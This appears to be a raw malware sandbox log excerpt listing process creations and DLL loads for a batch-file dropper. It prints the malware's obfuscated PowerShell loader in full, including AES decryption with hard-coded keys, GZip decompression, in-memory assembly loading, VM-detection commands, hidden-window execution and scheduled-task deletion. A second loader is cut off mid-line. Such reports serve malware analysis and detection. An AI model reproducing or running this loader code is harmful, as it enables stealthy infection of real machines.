Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oxbNdIdJMSmp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KEMhNhDQCLRUNV,[Parameter(Position=1)][Type]$HGdpxLKyUQ)$khFifhQytpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+'e'+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'e'+[Char](97)+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+[Char](111)+'Cla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$khFifhQytpa.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+','+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KEMhNhDQCLRUNV).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+''+'n'+'ag'+'e'+''+[Char](100)+'');$khFifhQytpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',N'+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$HGdpxLKyUQ,$KEMhNhDQCLRUNV).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $khFifhQytpa.CreateType();}$KRrkXMMJHQAWa=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+'M'+''+'i'+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.Un'+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+'d'+''+'s'+'');$doZKqFPbZxNLSh=$KRrkXMMJHQAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{613480bb-0e59-44d7-94a6-0c4ff8614e86}
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$cnt-onimai2\$cnt-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{613480bb-0e59-44d7-94a6-0c4ff8614e86}	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
